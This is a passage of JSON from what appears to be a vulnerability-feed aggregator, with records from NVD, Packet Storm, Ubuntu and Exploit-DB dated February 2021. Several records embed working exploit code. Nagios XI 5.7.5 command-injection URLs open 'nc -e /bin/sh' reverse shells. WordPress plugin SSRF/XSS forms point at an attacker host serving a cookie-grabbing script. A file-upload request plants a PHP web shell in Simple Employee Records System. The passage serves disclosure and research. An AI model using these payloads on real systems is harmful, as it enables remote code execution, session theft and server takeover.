The `DefaultResponder` will rewrite any undefined route paths to `vapor_route_undefined` to avoid unlimited counters.", "edition": 1, "cvss3": {}, "published": "2021-02-26T02:15:00", "title": "CVE-2021-21328", "type": "cve", "cwe": ["CWE-400"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2021-21328"], "modified": "2021-02-26T02:44:00", "cpe": [], "id": "CVE-2021-21328", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21328", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}], "packetstorm": [{"lastseen": "2021-02-26T16:40:53", "description": "", "published": "2021-02-26T00:00:00", "type": "packetstorm", "title": "Nagios XI 5.7.5 Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-25296", "CVE-2021-25297", "CVE-2021-25298", "CVE-2021-25299"], "modified": "2021-02-26T00:00:00", "id": "PACKETSTORM:161561", "href": "https://packetstormsecurity.com/files/161561/Nagios-XI-5.7.5-Remote-Code-Execution.html", "sourceData": "`# nagios-xi-5.7.5-bugs \nBugs reported to Nagios XI \n \n \n## CVE-2021-25296 \n \n### Code Location \n \n`/usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php` \n \n### Code snippet \n \n```php \nif (!empty($plugin_output_len)) { \n$disk_wmi_command .= \" --forcetruncateoutput \" . $plugin_output_len; \n$service_wmi_command .= \" --forcetruncateoutput \" . $plugin_output_len; \n$process_wmi_command .= \" --forcetruncateoutput \" . 
$plugin_output_len; \n} \necho $disk_wmi_command; \n// Run the WMI plugin to get realtime info \nexec($disk_wmi_command, $disk_output, $disk_return_var); \nexec($service_wmi_command, $service_output, $service_return_var); \nexec($process_wmi_command, $process_output, $process_return_var); \n``` \n \n### POC (Works with admin/non-admin authentication) \n \n`https://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=50c0f98fe9018dc43c81672ad1aeed5fd3f9710f013381519e553f846b5c2a86&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&plugin_output_len=&ip_address=127.0.0.1&domain=127.0.0.1&username=asdf&password=asdf&auth_file=&plugin_output_len=1024; nc -e /bin/sh 127.0.0.1 4444;&submitButton2=` \n \nThe `plugin_output_len` variable here is not sanitized and can give `command execution`. Eg: `plugin_output_len=1024; nc -e /bin/sh 127.0.0.1 4444;` \n \n \n## CVE-2021-25297 \n \n### Code Location \n \n`/usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php` \n \n### Code Snippet \n \n```php \nfunction switch_configwizard_add_cfg_to_mrtg($address) \n{ \n// get the data that we need \n$mrtg_confd_dir = \"/etc/mrtg/conf.d\"; \necho $address; \n$mrtg_cfg_file = \"{$address}.cfg\"; \n$absolute_mrtg_cfg_file = \"{$mrtg_confd_dir}/{$mrtg_cfg_file}\"; \n$cfgmaker_file = switch_configwizard_get_walk_file($address); \n// check if the file already exists for useful debugging \n$mrtg_confd_contents = scandir($mrtg_confd_dir); \necho \"REACHED HERE1\"; \nif (in_array($mrtg_cfg_file, $mrtg_confd_contents)) { \ndebug(\"{$mrtg_cfg_file} exists in {$mrtg_confd_dir}, overwriting\"); \n} else { \ndebug(\"{$mrtg_cfg_file} does not exist in {$mrtg_confd_dir}, creating\"); \n} \necho \"REACHED HERE2\"; \n// copy the cfgmaker file to the mrtg cfg destination \necho $cfgmaker_file; \necho $absolute_mrtg_cfg_file; \nif (!copy($cfgmaker_file, $absolute_mrtg_cfg_file)) { \ndebug(\"Unable to copy from {$cfgmaker_file} to {$absolute_mrtg_cfg_file}\"); \nreturn false; \n} 
\necho \"REACHED HERE3\"; \necho $absolute_mrtg_cfg_file; \n// add some meta info to the file \n$infoline = \"#### ADDED BY NAGIOSXI (User: \". get_user_attr(0, 'username') .\", DATE: \". get_datetime_string(time()) .\") ####\\n\"; \nexec(\"sed -i '1s|.*|{$infoline}&|' $absolute_mrtg_cfg_file\"); \n \nreturn true; \n} \n``` \n \n### POC (Works with admin/non-admin authentication) \n \n``` \nhttps://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=4e4f78ca5c24c7c526dc86b23092b81c3231a7bf59e1eb67f9918b8daf7b6de9&nextstep=3&wizard=switch&ip_address=127.0.0.1;nc -e /bin/sh 127.0.0.1 4445;&port=161&snmpversion=2c&snmpopts%5Bsnmpcommunity%5D=public&snmpopts%5Bv3_security_level%5D=authPriv&snmpopts%5Bv3_username%5D=&snmpopts%5Bv3_auth_password%5D=&snmpopts%5Bv3_auth_proto%5D=MD5&snmpopts%5Bv3_priv_password%5D=&snmpopts%5Bv3_priv_proto%5D=DES&portnames=number&scaninterfaces=on&bulk_fields%5B%5D=ip_address&bulk_fields%5B%5D=&bulk_fields%5B%5D=&bulk_options=&bulk_fields%5B%5D=&bulk_fields%5B%5D=&warn_speed_in_percent=50&crit_speed_in_percent=80&warn_speed_out_percent=50&crit_speed_out_percent=80&default_port_speed=100&submitButton2= \n``` \n \nThe `ip_address` variable here is not sanitized and can give `command execution`. 
Eg: `ip_address=1024; nc -e /bin/sh 127.0.0.1 4444;` \n \n \n## CVE-2021-25298 \n \n### Code path \n \n`/usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php` \n \n### Code Snippet \n \n```php \ncase CONFIGWIZARD_MODE_GETSTAGE2HTML: \n \n// echo (\"reached here ============================\"); \n// Get variables that were passed to us \n$address = grab_array_var($inargs, \"ip_address\", \"\"); // [User input] \n$port = grab_array_var($inargs, \"port\", \"\"); \n$token = grab_array_var($inargs, \"token\", \"\"); \n$no_ssl_verify = grab_array_var($inargs, \"no_ssl_verify\", 1); \n$hostname = grab_array_var($inargs, 'hostname', gethostbyaddr($address)); \n$default_mem_units = grab_array_var($inargs, 'default_mem_units', 'Gi'); \n$tcp_check_port = grab_array_var($inargs, 'tcp_check_port', '5693'); \n$rp_address = nagiosccm_replace_user_macros($address); \n$rp_port = nagiosccm_replace_user_macros($port); \n$rp_token = nagiosccm_replace_user_macros($token); \n$services_serial = grab_array_var($inargs, \"services_serial\", \"\"); \nif ($services_serial) { \n$services = unserialize(base64_decode($services_serial)); \n} \n// echo $rp_address; \n$not_used = array(); \n$return_code = 0; \n$alternative_host_check = false; \nexec('ping -W 2 -c 1 ' . $rp_address, $not_used, $return_code); // [Bug here] \n``` \n \n### POC (Works with admin/non-admin authentication) \n \n``` \nhttps://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=e2401df06a3892ba612df20e1ce2f559d7647c4b5fcba7f64c23c0ea9df1564f&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1;nc -e /bin/sh 127.0.0.1 4445;&port=5693&token=123&submitButton2= \n``` \n \nThe `ip_address` variable here is not sanitized and can give `command execution`. 
Eg: `ip_address=1024; nc -e /bin/sh 127.0.0.1 4444;` \n \n \n## CVE-2021-25299 \n \n### Code Location \n \n`/usr/local/nagiosxi/html/admin/sshterm.php` \n \n### Code Snippet \n \n```php+HTML \n<?php if ($efe) { ?> \n<iframe src=\"<?php echo $url; ?>\" style=\"width: 50%; min-width: 600px; height: 500px;\"></iframe> \n<?php } else { ?> \n<div style=\"color: #FFF; font-size: 14px; font-family: consolas, courier-new; background-color: #000; padding: 2px 6px; overflow-y: scroll; width: 50%; min-width: 600px; height: 500px;\">Enterprise features must be enabled</div> \n<?php \n} \n``` \n \n### POC \n \n`https://10.0.2.15/nagiosxi/admin/sshterm.php?url=javascript:alert(1)` \n \nThe `url` variable is not sanitized and can give `xss` . \n \n`\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/161561/nagiosxi575-exec.txt"}, {"lastseen": "2021-02-26T16:43:36", "description": "", "published": "2021-02-26T00:00:00", "type": "packetstorm", "title": "WordPress Under Construction, Coming Soon, And Maintenance Mode 1.1.1 SSRF / XSS", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-02-26T00:00:00", "id": "PACKETSTORM:161576", "href": "https://packetstormsecurity.com/files/161576/WordPress-Under-Construction-Coming-Soon-And-Maintenance-Mode-1.1.1-SSRF-XSS.html", "sourceData": "`There are SSRF and RXSS vulnerabilities in the WordPress plugin Under Construction, Coming Soon & Maintenance Mode version 1.1.1. \nBoth vulnerabilities are fixed in version 1.1.2: \nhttps://wordpress.org/plugins/under-construction-maintenance-mode/#developers \n \n[1] SSRF \n \nHere is the relevant code from file includes/mc-get_lists.php: \n \n$apiKey = $_POST['apiKey']; \n$dataCenter = substr( $apiKey , strpos( $apiKey,'-' ) + 1 ); \n$url = 'https://'. $dataCenter. 
'.api.mailchimp.com/3.0/lists/'; \n \nThe user submits the POST parameter \"apiKey\", and the code constructs a https URL from it without any sanitization and then \nretrieves it with cURL, which leads to a SSRF bug. \n \nPOC: \n \n<form method=\"post\" action=\"http://attacked.server/wp-content/plugins/under-construction-maintenance-mode/includes/mc-get_lists.php\"> \n<input type=\"text\" name=\"apiKey\" value=\"-localhost:8765/test/test/test?key1=val1&dummy=\" /> \n<input type=\"submit\" value=\"Submit!\" /> \n</form> \n \n[2] RXSS \n \nThe code in the same file decodes JSON data fetched from the URL and then displays HTML code from the retrieved data without \nany HTML escaping, leading to a reflected cross-site scripting issue where the payload is on a different server. \n \nPOC (attacked.server runs WordPress with a vulnerable version of this plugin, and hacker.server is run by the attacker): \n \n<form method=\"post\" action=\"http://attacked.server/wp-admin/admin-ajax.php\"> \n<input type=\"hidden\" name=\"action\" value=\"ucmm_mc_api\" /> \n<input type=\"text\" name=\"apiKey\" value=\"-hacker.server/test.json?dummy=\" /> \n<input type=\"submit\" value=\"Submit!\" /> \n</form> \n \ntest.json: \n \n[[{\"id\":\"<script>alert(document.location);alert(document.cookie);<\\/script>\"}]] \n \n// Mr.F in 2021 \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161576/wpuccsmm111-xssssrf.txt"}], "ubuntu": [{"lastseen": "2021-02-27T03:58:11", "bulletinFamily": "unix", "cvelist": ["CVE-2021-23979", "CVE-2021-23972", "CVE-2021-23971", "CVE-2021-23969", "CVE-2021-23974", "CVE-2021-23975", "CVE-2021-23978", "CVE-2021-23973", "CVE-2021-23970", "CVE-2021-23968"], "description": "Multiple security issues were discovered in Firefox. 
If a user were \ntricked into opening a specially crafted website, an attacker could \npotentially exploit these to cause a denial of service, obtain sensitive \ninformation, conduct cross-site scripting (XSS) attacks, bypass HTTP auth \nphishing warnings, or execute arbitrary code.", "edition": 1, "modified": "2021-02-26T00:00:00", "published": "2021-02-26T00:00:00", "id": "USN-4756-1", "href": "https://ubuntu.com/security/notices/USN-4756-1", "title": "Firefox vulnerabilities", "type": "ubuntu", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2021-02-26T10:29:26", "description": "", "published": "2021-02-26T00:00:00", "type": "exploitdb", "title": "Simple Employee Records System 1.0 - File Upload RCE (Unauthenticated)", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-02-26T00:00:00", "id": "EDB-ID:49596", "href": "https://www.exploit-db.com/exploits/49596", "sourceData": "# Exploit Title: Simple Employee Records System 1.0 - File Upload RCE (Unauthenticated)\r\n# Date: 2021-02-25\r\n# Exploit Author: sml@lacashita.com\r\n# Vendor Homepage: https://www.sourcecodester.com/php/11393/employee-records-system.html\r\n# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employee_records_system.zip\r\n# Version: v1.0\r\n# Tested on: Ubuntu 20.04.2\r\n\r\nuploadID.php can be used to upload .php files to \r\n'/uploads/employees_ids/' without authentication.\r\n\r\nPOC\r\n---\r\n\r\n1) Make the following Request changing the \"Host:\" to your Victim IP.\r\n\r\nPOST /dashboard/uploadID.php HTTP/1.1\r\nHost: 192.168.1.117\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 \r\nFirefox/78.0\r\nAccept: application/json, text/javascript, */*; q=0.01\r\nAccept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nX-Requested-With: XMLHttpRequest\r\nContent-Type: multipart/form-data; 
\r\nboundary=---------------------------5825462663702204104870787337\r\nContent-Length: 267\r\nDNT: 1\r\nConnection: close\r\n\r\n-----------------------------5825462663702204104870787337\r\nContent-Disposition: form-data; name=\"employee_ID\"; filename=\"cmd2.php\"\r\nContent-Type: image/png\r\n<?php\r\n$cmd=$_GET['cmd'];\r\nsystem($cmd);\r\n?>\r\n-----------------------------5825462663702204104870787337--\r\n\r\n\r\n2) You will get the response with the name of the uploaded file \r\n(upload_filename).\r\n\r\nHTTP/1.1 200 OK\r\nServer: nginx/1.18.0 (Ubuntu)\r\nDate: Thu, 25 Feb 2021 19:17:55 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nContent-Length: 77\r\n{\"upload_filename\":\"Ag1rzKFWTlnCZhL_cmd2.php\",\"selected_filename\":\"cmd2.php\"}\r\n\r\n3) Your file will be located in: \r\nhttp://VICTIM_IP/uploads/employees_ids/Ag1rzKFWTlnCZhL_cmd2.php\r\n\r\n4) In this example, to run commands:\r\nhttp://192.168.1.117/uploads/employees_ids/Ag1rzKFWTlnCZhL_cmd2.php?cmd=whoami", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/49596"}]}